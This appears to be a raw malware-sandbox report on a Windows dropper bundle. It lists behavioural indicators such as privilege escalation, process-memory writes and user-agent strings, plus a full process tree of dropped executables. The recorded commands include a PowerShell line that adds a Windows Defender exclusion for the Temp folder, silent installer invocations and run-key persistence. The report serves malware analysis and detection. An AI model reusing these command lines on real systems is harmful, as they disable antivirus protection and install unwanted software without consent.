8f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Tue118f55232e4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	119	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	205	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2112	Tue11bc0507b56295.exe
2112	Tue11bc0507b56295.exe
188	powershell.exe
188	powershell.exe
188	powershell.exe
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
188	powershell.exe
188	powershell.exe
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe
4132	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3008	Process not Found

Suspicious behavior: MapViewOfSection 22 IoCs

pid	Process
2112	Tue11bc0507b56295.exe
6980	MicrosoftEdgeCP.exe
6980	MicrosoftEdgeCP.exe
6980	MicrosoftEdgeCP.exe
6980	MicrosoftEdgeCP.exe
6980	MicrosoftEdgeCP.exe
6980	MicrosoftEdgeCP.exe
7480	vbbsdtw
6980	MicrosoftEdgeCP.exe
6980	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
11224	vbbsdtw
11256	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
16488	vbbsdtw
17228	MicrosoftEdgeCP.exe
17228	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5892	3470105.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3828	Tue11f251db82fb7b.exe
Token: SeCreateTokenPrivilege	2184	Tue118f55232e4.exe
Token: SeAssignPrimaryTokenPrivilege	2184	Tue118f55232e4.exe
Token: SeLockMemoryPrivilege	2184	Tue118f55232e4.exe
Token: SeIncreaseQuotaPrivilege	2184	Tue118f55232e4.exe
Token: SeMachineAccountPrivilege	2184	Tue118f55232e4.exe
Token: SeTcbPrivilege	2184	Tue118f55232e4.exe
Token: SeSecurityPrivilege	2184	Tue118f55232e4.exe
Token: SeTakeOwnershipPrivilege	2184	Tue118f55232e4.exe
Token: SeLoadDriverPrivilege	2184	Tue118f55232e4.exe
Token: SeSystemProfilePrivilege	2184	Tue118f55232e4.exe
Token: SeSystemtimePrivilege	2184	Tue118f55232e4.exe
Token: SeProfSingleProcessPrivilege	2184	Tue118f55232e4.exe
Token: SeIncBasePriorityPrivilege	2184	Tue118f55232e4.exe
Token: SeCreatePagefilePrivilege	2184	Tue118f55232e4.exe
Token: SeCreatePermanentPrivilege	2184	Tue118f55232e4.exe
Token: SeBackupPrivilege	2184	Tue118f55232e4.exe
Token: SeRestorePrivilege	2184	Tue118f55232e4.exe
Token: SeShutdownPrivilege	2184	Tue118f55232e4.exe
Token: SeDebugPrivilege	2184	Tue118f55232e4.exe
Token: SeAuditPrivilege	2184	Tue118f55232e4.exe
Token: SeSystemEnvironmentPrivilege	2184	Tue118f55232e4.exe
Token: SeChangeNotifyPrivilege	2184	Tue118f55232e4.exe
Token: SeRemoteShutdownPrivilege	2184	Tue118f55232e4.exe
Token: SeUndockPrivilege	2184	Tue118f55232e4.exe
Token: SeSyncAgentPrivilege	2184	Tue118f55232e4.exe
Token: SeEnableDelegationPrivilege	2184	Tue118f55232e4.exe
Token: SeManageVolumePrivilege	2184	Tue118f55232e4.exe
Token: SeImpersonatePrivilege	2184	Tue118f55232e4.exe
Token: SeCreateGlobalPrivilege	2184	Tue118f55232e4.exe
Token: 31	2184	Tue118f55232e4.exe
Token: 32	2184	Tue118f55232e4.exe
Token: 33	2184	Tue118f55232e4.exe
Token: 34	2184	Tue118f55232e4.exe
Token: 35	2184	Tue118f55232e4.exe
Token: SeDebugPrivilege	3956	jhuuee.exe
Token: SeDebugPrivilege	188	powershell.exe
Token: SeDebugPrivilege	4564	516335.exe
Token: SeDebugPrivilege	4760	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4932	2.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeRestorePrivilege	4768	MsiExec.exe
Token: SeBackupPrivilege	4768	MsiExec.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeDebugPrivilege	4132	WerFault.exe
Token: SeDebugPrivilege	4768	MsiExec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
5824	setup_2.tmp
6184	ultramediaburner.tmp
4764	installer.exe
3008	Process not Found
3008	Process not Found

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
3008	Process not Found
5648	MicrosoftEdge.exe
4120	cmd.exe
6980	MicrosoftEdgeCP.exe
6980	MicrosoftEdgeCP.exe
10976	MicrosoftEdge.exe
11256	MicrosoftEdgeCP.exe
11256	MicrosoftEdgeCP.exe
16816	MicrosoftEdge.exe
17228	MicrosoftEdgeCP.exe
17228	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3008	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1404 wrote to memory of 2908	1404	setup_x86_x64_install.exe	74
PID 1404 wrote to memory of 2908	1404	setup_x86_x64_install.exe	74
PID 1404 wrote to memory of 2908	1404	setup_x86_x64_install.exe	74
PID 2908 wrote to memory of 1220	2908	setup_installer.exe	75
PID 2908 wrote to memory of 1220	2908	setup_installer.exe	75
PID 2908 wrote to memory of 1220	2908	setup_installer.exe	75
PID 1220 wrote to memory of 2268	1220	setup_install.exe	79
PID 1220 wrote to memory of 2268	1220	setup_install.exe	79
PID 1220 wrote to memory of 2268	1220	setup_install.exe	79
PID 1220 wrote to memory of 1764	1220	setup_install.exe	78
PID 1220 wrote to memory of 1764	1220	setup_install.exe	78
PID 1220 wrote to memory of 1764	1220	setup_install.exe	78
PID 1220 wrote to memory of 744	1220	setup_install.exe	80
PID 1220 wrote to memory of 744	1220	setup_install.exe	80
PID 1220 wrote to memory of 744	1220	setup_install.exe	80
PID 1220 wrote to memory of 360	1220	setup_install.exe	81
PID 1220 wrote to memory of 360	1220	setup_install.exe	81
PID 1220 wrote to memory of 360	1220	setup_install.exe	81
PID 1220 wrote to memory of 3944	1220	setup_install.exe	82
PID 1220 wrote to memory of 3944	1220	setup_install.exe	82
PID 1220 wrote to memory of 3944	1220	setup_install.exe	82
PID 1220 wrote to memory of 3568	1220	setup_install.exe	87
PID 1220 wrote to memory of 3568	1220	setup_install.exe	87
PID 1220 wrote to memory of 3568	1220	setup_install.exe	87
PID 1220 wrote to memory of 3448	1220	setup_install.exe	86
PID 1220 wrote to memory of 3448	1220	setup_install.exe	86
PID 1220 wrote to memory of 3448	1220	setup_install.exe	86
PID 1220 wrote to memory of 632	1220	setup_install.exe	83
PID 1220 wrote to memory of 632	1220	setup_install.exe	83
PID 1220 wrote to memory of 632	1220	setup_install.exe	83
PID 1220 wrote to memory of 3016	1220	setup_install.exe	84
PID 1220 wrote to memory of 3016	1220	setup_install.exe	84
PID 1220 wrote to memory of 3016	1220	setup_install.exe	84
PID 1220 wrote to memory of 3168	1220	setup_install.exe	85
PID 1220 wrote to memory of 3168	1220	setup_install.exe	85
PID 1220 wrote to memory of 3168	1220	setup_install.exe	85
PID 1764 wrote to memory of 1792	1764	cmd.exe	88
PID 1764 wrote to memory of 1792	1764	cmd.exe	88
PID 1764 wrote to memory of 1792	1764	cmd.exe	88
PID 3448 wrote to memory of 1096	3448	cmd.exe	89
PID 3448 wrote to memory of 1096	3448	cmd.exe	89
PID 3448 wrote to memory of 1096	3448	cmd.exe	89
PID 2268 wrote to memory of 188	2268	cmd.exe	90
PID 2268 wrote to memory of 188	2268	cmd.exe	90
PID 2268 wrote to memory of 188	2268	cmd.exe	90
PID 3568 wrote to memory of 2112	3568	cmd.exe	91
PID 3568 wrote to memory of 2112	3568	cmd.exe	91
PID 3568 wrote to memory of 2112	3568	cmd.exe	91
PID 744 wrote to memory of 1332	744	cmd.exe	97
PID 744 wrote to memory of 1332	744	cmd.exe	97
PID 744 wrote to memory of 1332	744	cmd.exe	97
PID 3944 wrote to memory of 4072	3944	cmd.exe	96
PID 3944 wrote to memory of 4072	3944	cmd.exe	96
PID 3944 wrote to memory of 4072	3944	cmd.exe	96
PID 3016 wrote to memory of 2184	3016	cmd.exe	95
PID 3016 wrote to memory of 2184	3016	cmd.exe	95
PID 3016 wrote to memory of 2184	3016	cmd.exe	95
PID 632 wrote to memory of 3956	632	cmd.exe	94
PID 632 wrote to memory of 3956	632	cmd.exe	94
PID 3168 wrote to memory of 3200	3168	cmd.exe	93
PID 3168 wrote to memory of 3200	3168	cmd.exe	93
PID 3168 wrote to memory of 3200	3168	cmd.exe	93
PID 1332 wrote to memory of 4228	1332	Tue11b9d76a96506.exe	98
PID 1332 wrote to memory of 4228	1332	Tue11b9d76a96506.exe	98

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2664

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2464

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1324

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:924
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:7620
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:7656
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:1876
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:3232
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6044
- C:\Users\Admin\AppData\Roaming\vbbsdtw
  C:\Users\Admin\AppData\Roaming\vbbsdtw
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:7480
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:8580
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4868
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:10096
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:7180
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:9756
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:9264
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:9976
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:12196
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:11920
- C:\Users\Admin\AppData\Roaming\vbbsdtw
  C:\Users\Admin\AppData\Roaming\vbbsdtw
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:11224
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:11636
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:13116
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:13792
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:12564
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:13428
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:14496
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:15264
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:15240
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:16344
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:15516
- C:\Users\Admin\AppData\Roaming\vbbsdtw
  C:\Users\Admin\AppData\Roaming\vbbsdtw
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:16488
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:15692
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:14908
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:10556
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:12132

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1020

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1764
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11d7385a978cc.exe
        
        Tue11d7385a978cc.exe
        5⤵
        Executes dropped EXE
        
        PID:1792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:188
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:744
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11b9d76a96506.exe
        
        Tue11b9d76a96506.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1332
      - C:\Users\Admin\AppData\Local\Temp\is-8CP5M.tmp\Tue11b9d76a96506.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8CP5M.tmp\Tue11b9d76a96506.tmp" /SL5="$3006A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11b9d76a96506.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4228
        
        C:\Users\Admin\AppData\Local\Temp\is-JRO8S.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JRO8S.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:4812
        
        C:\Program Files\Windows Media Player\BWCAQZXYMI\ultramediaburner.exe
        
        "C:\Program Files\Windows Media Player\BWCAQZXYMI\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\is-SLE2A.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SLE2A.tmp\ultramediaburner.tmp" /SL5="$10304,281924,62464,C:\Program Files\Windows Media Player\BWCAQZXYMI\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:6184
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\75-04d10-9ae-fde93-e69a40202edb2\Lonasobyxe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\75-04d10-9ae-fde93-e69a40202edb2\Lonasobyxe.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:6260
        
        C:\Users\Admin\AppData\Local\Temp\60-bfdbe-af8-4c187-8dc923fde28bb\Wydyzhaelishu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\60-bfdbe-af8-4c187-8dc923fde28bb\Wydyzhaelishu.exe"
        8⤵
        Executes dropped EXE
        
        PID:6308
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gwcxcs12.r02\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\gwcxcs12.r02\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\gwcxcs12.r02\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:1228
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 648
        11⤵
        Program crash
        
        PID:7156
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 660
        11⤵
        Program crash
        
        PID:6396
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 772
        11⤵
        Program crash
        
        PID:2156
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 808
        11⤵
        Program crash
        
        PID:5008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 880
        11⤵
        Program crash
        
        PID:4816
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 928
        11⤵
        Program crash
        
        PID:7564
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 1092
        11⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:7748
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fknrz522.32w\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\fknrz522.32w\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\fknrz522.32w\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:4764
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fknrz522.32w\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fknrz522.32w\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630909315 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:7744
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zna3x3g5.ddr\anyname.exe & exit
        9⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\zna3x3g5.ddr\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\zna3x3g5.ddr\anyname.exe
        10⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\zna3x3g5.ddr\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zna3x3g5.ddr\anyname.exe" -u
        11⤵
        
        PID:6720
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1qgliwxw.ugd\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:6684
        
        C:\Users\Admin\AppData\Local\Temp\1qgliwxw.ugd\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\1qgliwxw.ugd\gcleaner.exe /mixfive
        10⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 648
        11⤵
        Program crash
        
        PID:4172
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 660
        11⤵
        Program crash
        
        PID:7112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 764
        11⤵
        Program crash
        
        PID:5668
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 800
        11⤵
        Program crash
        
        PID:7200
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 880
        11⤵
        Program crash
        
        PID:7392
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\udjpbai0.zyi\autosubplayer.exe /S & exit
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Executes dropped EXE
        
        PID:3812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
      4⤵
      PID:360
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11f251db82fb7b.exe
        
        Tue11f251db82fb7b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3828
